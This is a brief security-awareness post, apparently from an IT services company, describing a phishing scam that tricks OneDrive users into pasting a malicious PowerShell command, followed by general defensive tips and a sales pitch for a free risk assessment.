Cybersecurity experts have discovered a new phishing scam targeting Microsoft OneDrive users. This scam uses tricky social engineering tactics to get users to run a harmful PowerShell script on their computers.

How the Scam Works

  1. The Email: The scam starts with an email that contains an HTML file.
  2. Fake OneDrive Page: When you open the file, it shows a fake OneDrive page with an error message saying, "Failed to connect to the 'OneDrive' cloud service. To fix the error, you need to update the DNS cache manually."
  3. Two Options: The message offers two options: "How to fix" and "Details."
    • "Details" leads to a legitimate Microsoft page on DNS troubleshooting.
    • "How to fix" asks you to press "Windows Key + X" to open a menu, then launch PowerShell, and paste a command to fix the issue.
  4. Malicious Command: This command flushes the DNS cache, creates a folder on your C: drive, downloads a file, and runs a harmful script.

Who Is Targeted?

This scam has been found targeting users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K. It shows that phishing attacks are becoming more common and more sophisticated.

How This Scam Is Different

  • Complex Instructions: This scam uses detailed instructions to trick users into running a harmful script, unlike simpler phishing attacks that just ask for your login information.
  • Trusted Platforms: It uses legitimate-looking pages and trusted platforms like Microsoft OneDrive to fool users.

Protecting Your Business

  1. Educate Your Team: Train employees to recognize phishing emails and suspicious links. Emphasize the importance of verifying requests for sensitive actions.
  2. Implement Email Filtering: Use advanced email filtering solutions to detect and block phishing attempts before they reach your inbox.
  3. Regular Updates and Patches: Ensure that all software, including email clients and browsers, is up to date to protect against known vulnerabilities.
  4. Multi-Factor Authentication (MFA): Implement MFA to add an extra layer of security, making it harder for attackers to access accounts even if they manage to steal credentials.
  5. Regular Backups: Regularly back up important data to minimize damage in case of an attack.
  6. Monitor Systems: Use security monitoring tools to detect unusual activities and potential threats early.

Conclusion

The OneDrive phishing scam highlights the need for vigilance and proactive cybersecurity measures. By staying informed and implementing robust security practices, you can protect your business from evolving phishing threats.

Don’t wait until it’s too late. Click here or call 201-730-2468 to schedule your Free Cyber Risk Assessment with Arcee Tech today! We will evaluate your current security posture, identify vulnerabilities, and provide actionable insights to safeguard your organization against cyber attacks.

Contact us now to secure your assessment and strengthen your defenses!